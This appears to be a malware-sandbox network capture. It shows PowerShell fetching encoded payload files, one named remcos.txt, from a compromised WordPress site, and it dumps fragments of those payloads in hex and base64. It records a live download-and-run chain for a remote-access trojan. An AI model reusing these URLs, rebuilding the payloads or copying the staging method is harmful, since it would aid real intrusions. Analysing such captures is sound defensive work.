                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 55 6b 6c 45 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 45 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                  Data Ascii: AUklEDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJxAAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSMAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJxAAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSMAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklEDAAAAEQkR3cAVGdlxWZk91dl52
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 6f 43 41 41 41 41 77 2f 2f 2f 76 2f 41 4d 55 6f 30 41 77 51 68 71 43 41 41 41 41 41 41 4d 55 6f 6c 42 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 6c 54 4a 41 41 41 51 41 5a 4d 5a 42 69 41 51 52 2b 78 34 2f 2f 2f 2f 2f 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 6f 42 41 41 41 45 51 47 54 57 67 49 41 55 6b 66 76 2b 2f 2f 2f 2f 50 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 78 6b 46 49 43 41 44 4a 6c
                                  Data Ascii: AAAAA8///7PAAAAA////oCAAAAw///v/AMUo0AwQhqCAAAAAAMUolBAAAAw///v/AAAAA8///DNAAAAA////+DAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAgRlTJAAAQAZMZBiAQR+x4/////AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5oBAAAEQGTWgIAUkfv+////PAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkxkFICADJl
                                  2024-09-26 08:55:31 UTC16384INData Raw: 79 55 7a 51 44 4e 55 51 32 6b 54 4d 44 56 30 51 46 46 30 4e 33 45 45 4d 43 68 44 4e 79 49 45 52 77 45 55 4d 34 55 6a 52 45 52 6b 4d 33 4d 44 4e 47 46 44 4f 45 52 7a 4d 32 63 7a 51 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 52 42 4a 7a 51 46 4e 44 52 45 56 45 4f 44 56 44 4f 42 4a 44 52 35 45 44 52 46 4a 54 51 34 51 45 4f 35 4d 6a 4e 31 59 7a 51 42 56 7a 4e 34 4d 54 4d 77 55 6a 52 34 67 44 4d 30 45 7a 4d 77 49 54 4d 78 51 54 4d 34 55 6b 52 46 5a 7a 51 35 51 55
                                  Data Ascii: yUzQDNUQ2kTMDV0QFF0N3EEMChDNyIERwEUM4UjRERkM3MDNGFDOERzM2czQGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYURBJzQFNDREVEODVDOBJDR5EDRFJTQ4QEO5MjN1YzQBVzN4MTMwUjR4gDM0EzMwITMxQTM4UkRFZzQ5QU
                                  2024-09-26 08:55:31 UTC16384INData Raw: 5a 68 42 39 75 5a 43 65 4a 30 38 4f 37 75 33 32 63 4f 6d 62 6f 6a 52 66 6e 43 42 72 5a 75 44 79 6c 49 78 73 50 58 64 4c 70 2b 47 30 54 79 58 61 64 42 6f 76 66 4f 38 72 31 4c 59 4f 33 37 6c 4c 59 6a 4c 36 51 32 34 45 43 62 76 66 47 4a 47 56 66 78 38 6d 71 68 6e 6b 4e 41 6c 4f 64 53 4f 4c 74 2b 4c 70 2f 63 72 6a 6d 6f 74 65 65 6a 53 70 31 48 34 7a 6d 53 39 43 32 67 70 79 69 36 50 6a 34 45 64 77 5a 6e 6b 54 48 66 34 4d 51 2b 75 49 39 78 43 32 57 42 2f 50 61 41 4b 2f 4d 53 4d 71 70 54 6d 49 48 52 4a 53 36 48 42 63 35 6d 5a 71 7a 61 42 62 72 45 38 34 51 66 6e 68 53 78 65 44 79 43 7a 38 63 37 35 4c 4c 31 52 4b 68 32 32 78 35 4c 54 45 75 75 62 50 34 4c 74 53 6b 30 58 68 47 48 42 49 45 65 70 49 41 4e 78 59 46 43 68 51 78 77 74 79 58 54 65 38 6a 68 62 37 38 6a 6d
                                  Data Ascii: ZhB9uZCeJ08O7u32cOmbojRfnCBrZuDylIxsPXdLp+G0TyXadBovfO8r1LYO37lLYjL6Q24ECbvfGJGVfx8mqhnkNAlOdSOLt+Lp/crjmoteejSp1H4zmS9C2gpyi6Pj4EdwZnkTHf4MQ+uI9xC2WB/PaAK/MSMqpTmIHRJS6HBc5mZqzaBbrE84QfnhSxeDyCz8c75LL1RKh22x5LTEuubP4LtSk0XhGHBIEepIANxYFChQxwtyXTe8jhb78jm
                                  2024-09-26 08:55:31 UTC16384INData Raw: 39 6b 44 2f 34 78 51 6b 68 33 78 50 55 43 6e 72 65 62 4a 67 41 30 44 4f 72 6c 67 2f 37 44 54 42 2f 73 34 56 64 61 72 33 41 41 51 50 2b 55 41 4f 74 45 31 39 62 38 44 66 44 67 71 43 6b 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6f 6c 65 73 39 72 4c 42 68 77 76 79 72 6e 38 63 66 58 73 31 41 6b 46 72 2b 70 66 59 6b 35 39 2f 77 76 61 43 77 74 6c 31 49 4e 77 6c 6b 4d 67 71 56 44 68 56 42 4d 43 54 6d 41 5a 70 45 59 50 41 56 54 69 55 59 38 6c 4f 6e 2f 66 77 44 41 41 41 41 41 41 42 38 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 4d 45 4d 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: 9kD/4xQkh3xPUCnrebJgA0DOrlg/7DTB/s4Vdar3AAQP+UAOtE19b8DfDgqCkDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/oles9rLBhwvyrn8cfXs1AkFr+pfYk59/wvaCwtl1INwlkMgqVDhVBMCTmAZpEYPAVTiUY8lOn/fwDAAAAAAB8H8AAAAAAQA/BPAAAAAAAw/wDAAAAAAAMEMAAAAAAAADBDAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:31 UTC16384INData Raw: 39 47 69 61 45 42 4e 43 6c 32 7a 76 48 58 4e 49 6b 4b 43 41 41 30 4c 54 4a 71 4c 5a 79 72 56 56 2f 69 63 71 74 6d 41 53 67 43 51 76 41 78 78 59 6e 56 56 7a 43 38 62 79 39 56 6b 34 45 42 49 41 39 57 30 6c 75 42 6f 59 47 2f 78 76 4b 2f 55 37 61 74 4c 6f 41 30 72 53 62 6c 5a 36 66 6b 32 74 2f 75 73 4a 67 75 2f 67 67 44 51 76 6e 51 49 6b 4f 49 55 74 34 38 37 79 38 7a 56 48 62 42 4f 41 39 57 51 39 4e 54 75 6b 49 6e 7a 76 4d 50 4e 6d 6f 37 44 67 41 30 37 4b 6b 52 34 75 50 43 53 43 2f 32 4d 72 51 35 66 62 41 42 51 76 32 38 6d 70 7a 2f 50 2f 41 2f 72 7a 47 36 58 43 39 41 4d 41 39 32 54 46 32 42 53 78 53 46 38 76 50 2f 6c 71 2b 46 48 6f 41 30 4c 50 70 4a 48 79 54 55 65 51 2f 43 64 48 69 77 49 39 41 41 51 76 44 64 4d 4c 50 68 33 33 68 2b 4c 30 4d 69 46 6a 61 44 48
                                  Data Ascii: 9GiaEBNCl2zvHXNIkKCAA0LTJqLZyrVV/icqtmASgCQvAxxYnVVzC8by9Vk4EBIA9W0luBoYG/xvK/U7atLoA0rSblZ6fk2t/usJgu/ggDQvnQIkOIUt487y8zVHbBOA9WQ9NTukInzvMPNmo7DgA07KkR4uPCSC/2MrQ5fbABQv28mpz/P/A/rzG6XC9AMA92TF2BSxSF8vP/lq+FHoA0LPpJHyTUeQ/CdHiwI9AAQvDdMLPh33h+L0MiFjaDH
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 6f 42 77 63 41 6b 47 41 73 42 77 5a 41 34 47 41 6c 42 41 49 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 55 45 75 45 41 51 52 34 43 4b 41 46 74 4c 70 41 55 45 75 55 2b 44 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 34 44 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 2f 42 4f 41 41 41 41 41 41 41 77 2f 67 44 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 2f 44 50 41 41 41 41 41 41 41 77 66 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 51 41 2f 65 66 46 48 42 45 41 41 41 77 2f 2f 2f 2f 2f 34 44 41 41 41 38 6a 35 75 49 6b 2f 36 6e 7a
                                  Data Ascii: A4GAhBwYAkGAyBQZA0GAhBAAAAAAoBwcAkGAsBwZA4GAlBAIA4GAhBwYAkGAyBQZA0GAhBAAAAAAuBQYAMGApBgcAUGAtBQYAUEuEAQR4CKAFtLpAUEuU+D4AAAAAAAAAAAAAAAAAAw/4DAAAAAAAAAEAAAAAAAA/BOAAAAAAAw/gDAAAAAAAAIAAAAAAAAA/DPAAAAAAAwfwDAAAAAAA8H8AAAAAAQA/efFHBEAAAw/////4DAAA8j5uIk/6nz


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  6           192.168.2.4  49744        15.235.85.194   443               7728  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp                Bytes transferred  Direction  Data
                                  2024-09-26 08:55:36 UTC  117                OUT        GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                                                                         Host: www.informacionoportuna.com
                                                                                         Connection: Keep-Alive
                                  2024-09-26 08:55:37 UTC  211                IN         HTTP/1.1 200 OK
                                                                                         Connection: close
                                                                                         content-type: text/plain
                                                                                         last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                                                                         accept-ranges: bytes
                                                                                         content-length: 11608
                                                                                         date: Thu, 26 Sep 2024 08:55:36 GMT
                                                                                         server: LiteSpeed
                                  2024-09-26 08:55:37 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                  2024-09-26 08:55:37 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                  Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  7           192.168.2.4  49745        15.235.85.194   443               7728  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp                Bytes transferred  Direction  Data
                                  2024-09-26 08:55:37 UTC  89                 OUT        GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                                                                         Host: www.informacionoportuna.com
                                  2024-09-26 08:55:37 UTC  211                IN         HTTP/1.1 200 OK
                                                                                         Connection: close
                                                                                         content-type: text/plain
                                                                                         last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                                                                         accept-ranges: bytes
                                                                                         content-length: 57008
                                                                                         date: Thu, 26 Sep 2024 08:55:37 GMT
                                                                                         server: LiteSpeed
                                  2024-09-26 08:55:37 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                  Data Ascii:
                                  2024-09-26 08:55:37 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii:
                                  2024-09-26 08:55:37 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                  Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                  2024-09-26 08:55:37 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                  Data Ascii: ggEMopIonEsQIEw5EsQI
                                  2024-09-26 08:55:38 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  8           192.168.2.4  49746        15.235.85.194   443               7728  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp                Bytes transferred  Direction  Data
                                  2024-09-26 08:55:38 UTC  90                 OUT        GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
                                                                                         Host: www.informacionoportuna.com
                                  2024-09-26 08:55:38 UTC  212                IN         HTTP/1.1 200 OK
                                                                                         Connection: close
                                                                                         content-type: text/plain
                                                                                         last-modified: Tue, 02 Jul 2024 14:55:59 GMT
                                                                                         accept-ranges: bytes
                                                                                         content-length: 659456
                                                                                         date: Thu, 26 Sep 2024 08:55:38 GMT
                                                                                         server: LiteSpeed
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 45 41 41 41 41 41 41 37 4d 2b 4f 46 76 44 6c 37 6b 78 4f 48 6f 44 2b 35 6f 58 4f 64 6c 44 55 35 45 55 4f 64 6b 7a 46 34 63 4f 4f 4d 6a 6a 72 34 51 4b 4f 64 68 54 51 34 63 7a 4e 4e 66 6a 76 33 6b 37 4e 30 65 7a 62 33 6f 32 4e 58 59 6a 31 32 38 72 4e 2b 5a 44 63 32 6f 57 4e 63 58 6a 61 31 55 57 4e 57 52 7a 31 30 73 4c 4e 56 53 44 6b 30 6f 77 4d 77 4e 54 56 7a 41 31 4d 35 4d 54 4b 79 34 75 4d 53 4c 54 7a 79 49 72 4d 67 4b 7a 6a 79 67 6f 4d 36 4a 54 63 79 59 6d 4d 63 4a 54 55 79 63 6b 4d 34 49 54 4a 78 51 66 4d 49 48 7a 76 78 6b 61 4d 49 47 44 64 78 55 56 4d 47 46 44 4c 78 51 41 4d 78 44 54 32 77 6f 4b 4d 6b 43 7a 4e 41 41 41 41 67 43 41 41 77 44 41 41 41 38 7a 2f 2f 41 2f 50 6d 2f 44 31 2f 77 38 50 34 2b 6a 6a 2f 6b 34 50 6e 39 44 58 2f 45 30 50 37 38 6a
                                  Data Ascii: AEAAAAAA7M+OFvDl7kxOHoD+5oXOdlDU5EUOdkzF4cOOMjjr4QKOdhTQ4czNNfjv3k7N0ezb3o2NXYj128rN+ZDc2oWNcXja1UWNWRz10sLNVSDk0owMwNTVzA1M5MTKy4uMSLTzyIrMgKzjygoM6JTcyYmMcJTUyckM4ITJxQfMIHzvxkaMIGDdxUVMGFDLxQAMxDT2woKMkCzNAAAAgCAAwDAAA8z//A/Pm/D1/w8P4+jj/k4Pn9DX/E0P78j
